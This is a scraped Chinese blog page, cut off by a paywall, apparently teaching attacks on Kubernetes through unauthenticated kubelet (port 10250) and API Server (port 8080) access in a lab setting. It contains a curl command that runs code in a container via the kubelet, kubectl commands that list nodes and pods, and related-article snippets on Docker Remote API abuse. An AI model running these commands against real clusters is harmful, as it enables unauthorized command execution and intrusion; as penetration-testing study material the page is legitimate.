云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

已于 2024-04-06 16:46:09 修改
阅读量1k 收藏 24
点赞数 15
分类专栏: 2024年程序员学习 文章标签: 云原生 kubernetes 安全
于 2024-04-06 16:46:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60607895/article/details/137432039
版权
本文探讨了云原生环境中的Kubernetes安全问题,重点在于API Server未授权访问的风险。通过案例分析,展示了如何攻击8080和6443端口,包括获取节点信息、创建恶意容器和容器逃逸。同时,提到了集群配置不当可能导致的6443端口允许匿名用户以管理员权限操作。最后,作者分享了网络安全学习资源,包括学习路线、视频教程和相关书籍。
摘要由CSDN通过智能技术生成

curl -XPOST -k “https://192.168.139.132:10250/run///” -d “cmd=id”

在这里插入图片描述
执行的命令是test03容器里的命令,需要进行容器逃逸。

二、演示案例-云原生-K8s安全-API Server未授权访问

1、攻击8080端口:API Server(Master)未授权访问

旧版本的k8s的API Server默认会开启两个端口:8080和6443。
6443是安全端口,安全端口使用TLS加密;但是8080端口无需认证,
仅用于测试。6443端口需要认证,且有 TLS 保护。(k8s<1.16.0为旧版本)
新版本k8s默认已经不开启8080。需要更改相应的配置

cd /etc/kubernetes/manifests/

  • –insecure-port=8080
  • –insecure-bind-address=0.0.0.0

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
重启kubelet进程

systemctl restart kubelet

在这里插入图片描述
kubectl官方工具下载地址:https://kubernetes.io/zh-cn/docs/tasks/tools/

一、获取所有主机(nodes)节点

kubectl.exe -s 192.168.139.130:8080 get nodes

在这里插入图片描述

二、获取所有容器(pods)节点

kubectl.exe -s 192.168.139.130:8080 get pods

在这里插入图片描述

三、创建新的docker容器

kubectl -s 19

最低0.47元/天 解锁文章
m0_60607895
关注
  • 15
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
API攻防-接口安全&WebPack&REST&SOAP&WSDL&WebService
m0_61506558的博客
12-22 675
简单对象访问协议是交换数据的一种协议规范,是一种轻量的、简单的、基于XML(标准通用标记语言下的一个子集)的协议,它被设计成在WEB上交换结构化的和固化的信息。SOAP不是WebService的专有协议。 SOAP使用HTTP来发送XML格式的数据,可以简单理解为:SOAP=HTTP+XML
K8s下的授权及利用
wintercc1219的博客
02-04 1878
K8s下的授权及利用,API Server 8080/6443 授权访问,漏洞复现,kubelet 10250 端口授权
安全K8S API Server 授权访问
王嘟嘟的博客
10-30 2281
通常情况下k8s会有两个API服务,一个是8080,还有一个是6443。6443提供https服务,并且不对外开放,支持认证和授权服务,默认情况下8080是不启动的。
云上攻防-云原生&Kubernetes&K8s安全&API&Kubelet授权访问&容器执行
最新发布
qq_53058639的博客
07-06 855
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。其核心的特点就是能够自主的管理容器来保证云平台中的容器按照用户的期望状态运行着,管理员可以加载一个微型服务,让规划器来找到合适的位置,同时,Kubernetes在系统提升工具以及人性化方面,让用户能够方便的部署自己的应用。
Docker Remote Api授权访问漏洞
Seth为理想奋斗
06-17 3086
一. 漏洞原因 dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375 docker守护进程监听在0.0.0.0,外网可访问 3, 没有使用iptables等限制可连接的来源ip二. 漏洞利用1.远程对被攻击的主机的docker容器进行操作docker -H tcp://remoteip:2375 images 远程启动被攻击主机的docker容
CVE-2022-22980 exp &amp;&amp; 靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
第61天-服务攻防-中间件安全&amp;CVE 复现&ampK8s&amp;Docker&amp;Jetty&amp;Websphere
2303_79055586的博客
05-02 999
相关工具链接链接:https://pan.baidu.com/s/1a6Zt4e96rk87Kz0Gpzepig提取码:ospa。
Day97:云上攻防-云原生&Kubernetes&K8s安全&API&Kubelet授权访问&容器执行
qq_61553520的博客
04-12 1488
小迪安全-Day97:云上攻防-云原生&Kubernetes&K8s安全&API&Kubelet授权访问&容器执行
云原生安全防护:为云环境提供安全保障,防止数据泄露和恶意攻击
图幻未来的博客
03-18 327
随着企业数字化程度的不断加深和对云计算的依赖程度不断提高,“云原生存储、计算和处理的数据安全和隐私保护问题”,成为企业必须面对的挑战之一。“云原生技术”(Cloud Native Technology)是基于云计算平台的一种软件架构模式,旨在实现高度自动化管理、弹性伸缩和高可用性等特性, 但是同时伴随着其高可拓展性和复杂性特点,也使得黑客攻击变得更加隐蔽难以防御。
云上攻防-云原生&K8s安全&实战场景&攻击Pod&污点Taint&横向移动&容器逃逸
siu~
03-08 773
1、云原生-K8s安全-横向移动-污点Taint 2、云原生-K8s安全-Kubernetes实战场景
红队攻防渗透技术实战流程:云安全云原生安全:特权模式和挂载模式
HACKONE的博客
05-18 149
红队云攻防实战1. 什么是云 1. 什么是云
从零开始学网安:云原生攻防靶场Metarget安装步骤
weixin_65176861的博客
03-01 863
Metarget的名称来源于meta-(元)加target(目标,靶机),是一个脆弱基础设施自动化构建框架,主要用于快速、自动化搭建从简单到复杂的脆弱云原生靶机环境。近期接触了云原生这个领域,要学习必然是打靶场来得快点,这里用到的就是绿盟科技推出的metarget。检查卸载老版本docker(这里最好是使用管理员权限进行操作)注意:metarget需要在root模式下运行。这样就算是安装成功啦!
渗透测试:k8s的3种攻击手段(Kubernetes授权漏洞,端口:8080、6443、10250)
墨痕诉清风的博客
09-08 1万+
本文从k8s api-server 8080端口授权访问kubelet 10250端口授权访问、rbac权限三方面不安全配置,介绍了渗透k8s集群的方法。渗透集群手法还有很多种,后文再表。
Kubernetesk8s)集群渗透
weixin_45253622的博客
08-27 1768
Kubernetes,又称为 k8s,是一种可自动实施Linux容器操作的开源平台,可以帮助用户省去应用容器化过程的许多手动部署和扩展操作,也就是说,它可以将运行 Linux 容器的多组主机聚集在一起并轻松高效地管理这些集群。......
授权访问漏洞总结
热门推荐
七月_的博客
08-20 2万+
Web端 http://219.141.242.77:7777/pe-admin/ #后台授权访问 http://219.141.242.77:7777/pe-admin/main.jsp 参考:华泰保险某系统漏洞打包(授权访问\弱口令\Getshell) 服务端 授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值